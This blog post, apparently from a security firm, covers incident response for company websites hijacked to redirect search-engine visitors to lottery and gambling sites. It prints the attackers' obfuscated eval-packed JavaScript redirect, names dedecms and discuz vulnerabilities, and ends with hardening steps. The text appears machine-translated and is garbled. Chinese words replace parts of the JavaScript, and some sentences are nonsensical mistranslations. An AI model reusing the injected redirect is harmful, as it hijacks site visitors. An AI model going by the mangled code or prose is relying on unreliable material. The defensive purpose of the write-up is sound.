最近,我們的SINE安全公司連接到數(shù)十家公司網(wǎng)站被跳到了彩票,賭博網(wǎng)站,客戶從百度搜索網(wǎng)站反映,直接跳到彩票網(wǎng)站,直接輸入的網(wǎng)址沒有跳轉(zhuǎn),導(dǎo)致流量客戶網(wǎng)站的數(shù)量急劇下降。百度推廣和搜狗推廣已在彩票網(wǎng)站上做廣告。公司領(lǐng)導(dǎo)高度重視網(wǎng)站的安全性,因?yàn)楣镜男蜗蠛吐曌u(yù)損失太大。我們安排安全。技術(shù)人員在他們的網(wǎng)站上進(jìn)行全面的網(wǎng)站安全測試,對網(wǎng)站的后門,木馬后門和安全加固進(jìn)行全面的刪除和錯(cuò)誤修復(fù)。關(guān)于網(wǎng)站被跳到彩票和賭博網(wǎng)站的問題,組織了一個(gè)詳細(xì)的過程,希望能夠幫助更多的網(wǎng)站管理員和公司網(wǎng)站運(yùn)營商。
網(wǎng)站被跳轉(zhuǎn)彩票網(wǎng)站問題分析
我們的SINE安全性具有公司網(wǎng)站所有者的詳細(xì)服務(wù)器信息(服務(wù)器IP遠(yuǎn)程端口管理員帳戶密碼,SSH端口,root帳戶密碼)。網(wǎng)站信息包括FTP帳戶密碼連接,以及安全部署部門技術(shù)的網(wǎng)站代碼。并且服務(wù)器系統(tǒng)執(zhí)行細(xì)致的安全檢測和分析。
在整體安全測試中,我們發(fā)現(xiàn)客戶端的網(wǎng)站有一個(gè)網(wǎng)站木馬后門,包括php腳本木馬,asp腳本木馬,jsp腳本木馬,我們通常撥打馬來西亞,可以惡意篡改網(wǎng)站,上傳,重命名,下載等。管理員的高權(quán)限操作。網(wǎng)站被跳的網(wǎng)站,使用的網(wǎng)站架構(gòu)是php + mysql架構(gòu),以及jsp + mysql架構(gòu)。他們中的大多數(shù)使用開源程序,如dedecms,編織夢系統(tǒng),phpcms系統(tǒng),discuz系統(tǒng)。
由于客戶網(wǎng)站一直跳到彩票和賭博網(wǎng)站,客戶只知道一些簡單的代碼,只能通過篡改主頁代碼找到惡意代碼刪除它,但姑息不是治愈,網(wǎng)站一直在跳躍,客戶經(jīng)常擔(dān)心這些問題,每天都在擔(dān)心。事實(shí)上,問題的根本原因在于網(wǎng)站存在漏洞和服務(wù)器安全性不足。我們的SINE處理了數(shù)千個(gè)網(wǎng)站。在經(jīng)驗(yàn)方面,該網(wǎng)站最有可能被篡改。它是篡改主頁的標(biāo)題,描述它,并在主頁頂部添加一些加密的字符,如下所示:/p>
北京賽車投注平臺_北京賽車pk10在線賬號_北京賽車pk10登陸平臺
上面的代碼是攻擊者添加的加密標(biāo)題和描述。解密后,發(fā)現(xiàn)內(nèi)容是賭博內(nèi)容,如北京賽車,PK10等。受到攻擊的另一個(gè)功能是您可以在首頁找到跳轉(zhuǎn)代碼。該代碼基于搜索引擎的特征來判斷跳轉(zhuǎn)。例如,確定客戶的訪問權(quán)限是通過百度搜索,360搜索,搜狗搜索。來的那些將直接跳到彩票并進(jìn)入賭博網(wǎng)站。以下代碼:
Type='text/java'> eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c + 29): c.toString( 36))};如果( '' 取代(/^ /,字符串)){而(C - )d [E(C)]=K [C] || E(c)中;!。K=[功能(e){retun d [e]}]; e=function(){return'\ w +'}; c=1;}; while(c - )if(k [c])p=p.replace(新的RegExp('\ b'+ e(c)+'\ b','g'),k [c]);返回p;}('l ['\ e \ c \ 1 \ m \ i \ 8 \ n \ 0 '] [' \ 7 \ 4 \ 9 \ 0 \ 8 '](' \?\ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 0 \?\ 3 \ 8 \ d \ 6 \ 0 \ 8 \?\ 0 \ 5 \?F\一個(gè)\ r \一個(gè)\ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 6 \ 2 \ 4 \ 1 \ d \ 6 \ S \ 0 \ 0 \ 3 \ 2 \ q \ 5 \ 5 \ 7 \ 7 \ 7 \ b \ 1 \ 3。\ E \一個(gè)\ 2 \ p \ b \ 1 \ C \ I \ 5 \?\ o \ 1 \ b \?F\ 2 \ 6 \克\?\ 5 \ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \克 ');',29,29'X74 | X63 | X73 | X70 | X72 | X2F | X22 | X77 | X65 | X69 | X61 | X2E | x6f | X3D | 64 | X6A | x3e | X3C | X6D | X79 | X78 |窗口| X75 | x6e | X6C | X38 | X3A | X76 | x68'.split( '|'),0,{} ))
跳轉(zhuǎn)到的彩票網(wǎng)站截圖如下:
另一個(gè)攻擊特征是網(wǎng)站在百度搜索并出現(xiàn)紅色風(fēng)險(xiǎn)標(biāo)志。百度URL安全中心提醒您,該網(wǎng)站可能會被黑客攻擊,并且某些頁面被非法篡改!紅色提示百度風(fēng)險(xiǎn)。領(lǐng)先客戶打開直接被百度攔截的網(wǎng)站,如下圖所示:
百度URL安全中心提醒您:
該網(wǎng)站可能被黑客入侵,一些網(wǎng)頁被非法篡改!查看詳細(xì)信息
您正在訪問:http ******* com/
該網(wǎng)站可能被黑客入侵,一些網(wǎng)頁被非法篡改,這可能會威脅到您的財(cái)產(chǎn)和信息安全。建議您謹(jǐn)慎訪問它。
對于網(wǎng)站上的非法篡改頁面(****** .com),請參考以下示例:
被黑客攻擊的URL快照1:******** com/011E ...
黑客URL快照2:******** com/010S ...
黑客URL快照3:******** com/004G ...
針對上述網(wǎng)站受到攻擊的特點(diǎn),我們進(jìn)行了全面的手動(dòng)代碼安全審核,網(wǎng)站漏洞檢測,網(wǎng)站木馬后門清理,dedecms網(wǎng)站發(fā)現(xiàn)sql注入漏洞,xss獲取管理員帳戶cookie漏洞, discuz有g(shù)ethell漏洞,注入獲取管理員漏洞,discuz上傳繞過漏洞,我們?nèi)嫘迯?fù)了上述漏洞,并做了網(wǎng)站安全部署,以及服務(wù)器安全部署,網(wǎng)站文件防篡改部署。
防止網(wǎng)站被跳轉(zhuǎn)的解決方法如下:
1.安全部署服務(wù)器目錄權(quán)限,加密管理員帳戶密碼,盡可能設(shè)置數(shù)字+大寫和小寫字母+特殊符號,并將普通權(quán)限帳戶分配給網(wǎng)站數(shù)據(jù)庫。
2.mysql數(shù)據(jù)庫默認(rèn)端口3306,更改為61116,并添加到端口安全策略,不對外開放,外部網(wǎng)絡(luò)IP無法連接到數(shù)據(jù)庫,只有本地127.0.0.1可以連接到數(shù)據(jù)庫到防止攻擊者惡意猜測。
3.服務(wù)器底層系統(tǒng)的安全加固,包括遠(yuǎn)程端口登錄的安全驗(yàn)證。
4.對網(wǎng)站代碼執(zhí)行全面的安全檢查,包括定期升級網(wǎng)站源代碼,修復(fù)程序和網(wǎng)站漏洞。